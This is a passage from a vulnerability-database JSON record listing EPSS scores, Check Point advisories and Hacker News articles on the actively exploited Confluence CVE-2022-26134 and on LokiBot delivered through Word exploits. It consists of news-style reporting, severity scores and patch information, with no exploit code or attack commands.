"1337DAY-ID-37433", "1337DAY-ID-37778", "1337DAY-ID-37779", "1337DAY-ID-37781", "1337DAY-ID-37783"]}]}, "epss": [{"cve": "CVE-2016-5128", "epss": 0.00704, "percentile": 0.77463, "modified": "2023-05-02"}, {"cve": "CVE-2021-1732", "epss": 0.00395, "percentile": 0.69459, "modified": "2023-05-01"}, {"cve": "CVE-2021-21195", "epss": 0.00477, "percentile": 0.72167, "modified": "2023-05-01"}, {"cve": "CVE-2021-26084", "epss": 0.97475, "percentile": 0.99938, "modified": "2023-05-01"}, {"cve": "CVE-2021-30551", "epss": 0.33503, "percentile": 0.9642, "modified": "2023-05-01"}, {"cve": "CVE-2021-30983", "epss": 0.00107, "percentile": 0.42117, "modified": "2023-05-02"}, {"cve": "CVE-2021-36942", "epss": 0.88993, "percentile": 0.9816, "modified": "2023-05-01"}, {"cve": "CVE-2021-39793", "epss": 0.00067, "percentile": 0.27427, "modified": "2023-05-02"}, {"cve": "CVE-2021-40444", "epss": 0.96903, "percentile": 0.99515, "modified": "2023-05-02"}, {"cve": "CVE-2022-1096", "epss": 0.00363, "percentile": 0.68151, "modified": "2023-05-02"}, {"cve": "CVE-2022-1232", "epss": 0.00119, "percentile": 0.44655, "modified": "2023-05-02"}, {"cve": "CVE-2022-1364", "epss": 0.00604, "percentile": 0.75386, "modified": "2023-05-02"}, {"cve": "CVE-2022-21882", "epss": 0.1347, "percentile": 0.94719, "modified": "2023-05-02"}, {"cve": "CVE-2022-22587", "epss": 0.00184, "percentile": 0.54157, "modified": "2023-05-02"}, {"cve": "CVE-2022-22620", "epss": 0.00183, "percentile": 0.54067, "modified": "2023-05-02"}, {"cve": "CVE-2022-26134", "epss": 0.97542, "percentile": 0.99988, "modified": "2023-05-02"}, {"cve": "CVE-2022-26925", "epss": 0.97418, "percentile": 0.99871, "modified": "2023-05-02"}, {"cve": "CVE-2022-30190", "epss": 0.9744, "percentile": 0.99895, "modified": "2023-05-02"}], "vulnersScore": 8.2}, "_state": {"dependencies": 1691805945, "score": 1691806551, "epss": 0}, "_internal": {"score_hash": "cfb354ee80c1ddde272250fa97c57b80"}}

{"checkpoint_advisories": [{"lastseen": "2022-05-20T03:33:07", "description": "An NTLM relay vulnerability exists in Microsoft Active Directory Certificate Services. A remote attack can coerce Windows hosts to authenticate to other machines via the MS-EFSRPC protocol and obtain its NTLM credential. Successful exploitation could lead to complete takeover of the target domain.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-27T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Active Directory Certificate Services NTLM Relay (CVE-2021-36942; CVE-2022-26925)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942", "CVE-2022-26925"], "modified": "2022-05-10T00:00:00", "id": "CPAI-2021-0487", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-02-16T19:32:09", "description": "A heap corruption vulnerability exists in Google Chrome. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-26T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Heap Corruption (CVE-2021-30551)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2021-07-26T00:00:00", "id": "CPAI-2021-0484", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-26T02:03:49", "description": "A use-after-free vulnerability exists in Apple OS. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-30T00:00:00", "type": "checkpoint_advisories", "title": "Apple OS Use After Free (CVE-2022-22620)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-06-30T00:00:00", "id": "CPAI-2022-0325", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:29:39", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Win32k Elevation of Privilege (CVE-2022-21882)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882"], "modified": "2022-01-11T00:00:00", "id": "CPAI-2022-0007", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:37:55", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer MSHTML. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer MSHTML Remote Code Execution (CVE-2021-40444)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0554", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:29:45", "description": "A remote code execution vulnerability exists in Atlassian Confluence. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2021-26084)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-09T00:00:00", "id": "CPAI-2021-0548", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-04T10:03:06", "description": "A remote code execution vulnerability exists in Atlassian Confluence. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2022-26134)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-12T00:00:00", "id": "CPAI-2022-0297", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-06-04T09:56:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjB-3FGATEcQvVgoHD4SeHSMPhxak-CS-oPPNSfU5-5SkLrm94tD5D0FIxx_OoOOtXyQiGBrKcDgRUW2iNO9g17pvv2yWaxWqF27SPffdburUe_xKI1xM67MdF81s7ep1qHWagF0rFoXsRGa15bMeP_43LBSreE8ELfJybJIroA1mHu5NL3se511yT6/s728-e100/jira.jpg>)\n\nAtlassian on Friday rolled out fixes to address a [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve remote code execution.\n\nTracked as [**CVE-2022-26134**](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>), the issue is similar to [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) \u2014 another security flaw the Australian software company patched in August 2021.\n\nBoth relate to a case of Object-Graph Navigation Language ([OGNL](<https://en.wikipedia.org/wiki/OGNL>)) injection that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\nThe newly discovered shortcoming impacts all supported versions of Confluence Server and Data Center, with every version after 1.3.0 also affected. It's been resolved in the following versions -\n\n * 7.4.17\n * 7.13.7\n * 7.14.3\n * 7.15.2\n * 7.16.4\n * 7.17.4\n * 7.18.1\n\nAccording to stats from internet asset discovery platform [Censys](<https://censys.io/cve-2022-26134-confluenza-omicron-edition/>), there are about 9,325 services across 8,347 distinct hosts running a vulnerable version of Atlassian Confluence, with [most instances](<https://datastudio.google.com/reporting/1fbdf17c-ae37-4501-bd3f-935b72d1f181/page/2DSuC>) located in the U.S., China, Germany, Russia, and France.\n\nEvidence of active exploitation of the flaw, likely by attackers of Chinese origin, came to light after cybersecurity firm Volexity discovered the flaw over the Memorial Day weekend in the U.S. during an incident response investigation.\n\n\"The targeted industries/verticals are quite widespread,\" Steven Adair, founder and president of Volexity, [said](<https://twitter.com/stevenadair/status/1532768026818490371>) in a series of tweets. \"This is a free-for-all where the exploitation seems coordinated.\"\n\n\"It is clear that multiple threat groups and individual actors have the exploit and have been using it in different ways. Some are quite sloppy and others are a bit more stealth.\"\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), besides [adding](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>) the zero-day bug to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), has also urged federal agencies to immediately block all internet traffic to and from the affected products and either apply the patches or remove the instances by June 6, 2022, 5 p.m. ET.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T08:57:00", "type": "thn", "title": "Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-04T08:57:38", "id": "THN:362401076AC227D49D729838DBDC2052", "href": "https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-17T10:25:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjJOMAEPqVWWitHSvFnZCKLyOSaDJql5EnF-l96RW57mmexBC_GQqnd__4R64YlOri0OO7PI1E6Pz9ezQs2U8kPJJA_6b2rXJnClq7hdpQjRTSwBjMOACqATXTcr67r69MFPbkkIxmbAcrcHcOa4bK7EWNBIVqGb74_0P1I1nXV7ZrpYVHtpOPYFnbxDxU9/s728-e365/macro.jpg>)\n\nMicrosoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called **LokiBot** on compromised systems.\n\n\"LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros>). \"It primarily targets Windows systems and aims to gather sensitive information from infected machines.\"\n\nThe cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of [CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) and [CVE-2022-30190](<https://thehackernews.com/2023/07/romcom-rat-targeting-nato-and-ukraine.html>) (aka Follina) to achieve code execution.\n\nThe Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot.\n\nThe injector also features evasion techniques to check for the presence of debuggers and determine if it's running in a virtualized environment.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhY0lBlalarJC15jGyY-iAo2cMsq9PmNO4l9CUjSvoLs_pFjhqaurstC3hpmGK9Z_LVY_Jzn5eET2tVtVC6fXjHE3_x17nB7UHLASP0A2WJSOfZKzS1XZgB0b5823Y1rklx3CtJLIzZLZZAWo8Py2PPQZEYFUQR-ZmWWl9JmGCLVLfE-PUdMq-d3r2MlL57/s728-e365/doc.jpg>)\n\nAn alternative chain discovered towards the end of May starts with a Word document incorporating a VBA script that executes a macro immediately upon opening the document using the \"Auto_Open\" and \"Document_Open\" functions.\n\nThe macro script subsequently acts as a conduit to deliver an interim payload from a remote server, which also functions as an injector to load LokiBot and connect to a command-and-control (C2) server.\n\nUPCOMING WEBINAR\n\n[Shield Against Insider Threats: Master SaaS Security Posture Management\n\n](<https://thn.news/I26t1VFD>)\n\nWorried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.\n\n[Join Today](<https://thn.news/I26t1VFD>)\n\n[LokiBot](<https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws>), not to be confused with an [Android banking trojan](<https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot>) of the same name, comes with capabilities to log keystrokes, capture screenshots, gather login credential information from web browsers, and siphon data from a variety of cryptocurrency wallets.\n\n\"LokiBot is a long-standing and widespread malware active for many years,\" Lin said. \"Its functionalities have matured over time, making it easy for cybercriminals to use it to steal sensitive data from victims. The attackers behind LokiBot continually update their initial access methods, allowing their malware campaign to find more efficient ways to spread and infect systems.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-17T09:04:00", "type": "thn", "title": "Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2023-07-17T09:04:48", "id": "THN:1B5512B7CB75F82A34395AC39A9B2680", "href": "https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-18T05:57:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj9rIpLd7Wt8S6XBYbfSyi_LxY3hVen8bxDxWgv56ywl84WByL1Zl26yIu_oQ18uh4gvIi8vulmy9q1SZTMxCmqhEiWx0sm82_GHXfs821huyPVdY3i9HR5j_Dk6uxz27udcCKd-Tl7Z1edq42KHthx8Ln0XuGeTqNQ5nDnXn7z5jvyBqljfIiqhIVu/s728-e100/ransomware.jpg>)\n\nA recently patched [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.\n\nIn at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a [crypto miner](<https://blog.checkpoint.com/2022/06/09/crypto-miners-leveraging-atlassian-zero-day-vulnerability/>) called z0miner on victim networks.\n\nThe bug ([CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>), CVSS score: 9.8), which was [patched](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) by Atlassian on June 3, 2022, enables an unauthenticated actor to inject malicious code that paves the way of remote code execution (RCE) on affected installations of the collaboration suite. All supported versions of Confluence Server and Data Center are affected.\n\nOther notable malware pushed as part of disparate instances of attack activity include Mirai and Kinsing bot variants, a rogue package called [pwnkit](<https://thehackernews.com/2022/01/12-year-old-polkit-flaw-lets.html>), and Cobalt Strike by way of a web shell deployed after gaining an initial foothold into the compromised system.\n\n\"The vulnerability, CVE-2022-26134, allows an attacker to spawn a remotely-accessible shell, in-memory, without writing anything to the server's local storage,\" Andrew Brandt, principal security researcher at Sophos, [said](<https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/>).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj4ylTTjRkYLtYQCSXoVz8gUgRgTa98lR7XaqcG9UbybTcDEi9J5hfotnq_Gutzoj81P5XHccmBjiW9E7KZlw5edBNyVl0N0zwIwuyQGM4A95z1ZdyCtPLIHlvFzE_XXxyZJjC55Sp3sPQrsczwhlKexPSQGqBrt0qHXhWsFMoMEcBZXvs-OTYPTLet/s728-e100/code.jpg>)\n\nThe disclosure overlaps with similar warnings from Microsoft, which [revealed](<https://twitter.com/MsftSecIntel/status/1535417776290111489>) last week that \"multiple adversaries and nation-state actors, including [DEV-0401](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0401>) and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134.\"\n\nDEV-0401, described by Microsoft as a \"China-based lone wolf turned LockBit 2.0 affiliate,\" has also been previously linked to ransomware deployments targeting internet-facing systems running VMWare Horizon ([Log4Shell](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>)), Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>)), and on-premises Exchange servers ([ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>)).\n\nThe development is emblematic of an [ongoing trend](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) where threat actors are increasingly capitalizing on newly disclosed critical vulnerabilities rather than exploiting publicly known, dated software flaws across a broad spectrum of targets.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-18T04:11:00", "type": "thn", "title": "Atlassian Confluence Flaw Being Used to Deploy Ransomware and Crypto Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-18T04:11:14", "id": "THN:0488E447E08622B0366A0332F848212D", "href": "https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T09:56:17", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgtFRIbOmYLbsTQsfQcmDa8dd7UbU-isTy7dToS2Gy1p7s--Zt-QgfjUpligZQwwZouhjIgGzL8kjD1QlluSfAvuZ7I7GKPJG21wA9tfWYRmChZ7jK57W-8AeMWNQDwHO9tEJkbBfs3AltDvfY7kp3Bl13jp3djDlSN_7F0g5plbOk_BGleGYX9aFNC/s728-e100/hackers.jpg>)\n\nAtlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild.\n\nThe Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as **CVE-2022-26134**.\n\n\"Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server,\" it [said](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) in an advisory.\n\n\"There are currently no fixed versions of Confluence Server and Data Center available. Atlassian is working with the highest priority to issue a fix.\" Specifics of the security flaw have been withheld until a software patch is available.\n\nAll supported versions of Confluence Server and Data Center are affected, although it's expected that all versions of the enterprise solution are potentially vulnerable. The earliest impacted version is yet to be ascertained.\n\nIn the absence of a fix, Atlassian is urging customers to restrict Confluence Server and Data Center instances from the internet or consider disabling the instances altogether. Alternatively, it has recommended implementing a web application firewall (WAF) rule which blocks URLs containing \"${\" to reduce the risk.\n\nVolexity, in an independent disclosure, said it detected the activity over the Memorial Day weekend in the U.S. as part of an incident response investigation.\n\nThe attack chain involved leveraging the Atlassian zero-day exploit \u2014 a command injection vulnerability \u2014 to achieve unauthenticated remote code execution on the server, enabling the threat actor to use the foothold to drop the Behinder web shell.\n\n\"[Behinder](<https://github.com/Freakboy/Behinder>) provides very powerful capabilities to attackers, including memory-only webshells and built-in support for interaction with Meterpreter and Cobalt Strike,\" the researchers [said](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). \"At the same time, it does not allow persistence, which means a reboot or service restart will wipe it out.\"\n\nSubsequently, the web shell is said to have been employed as a conduit to deploy two additional web shells to disk, including [China Chopper](<https://www.mandiant.com/resources/the-little-malware-that-could-detecting-and-defeating-the-china-chopper-web-shell>) and a custom file upload shell to exfiltrate 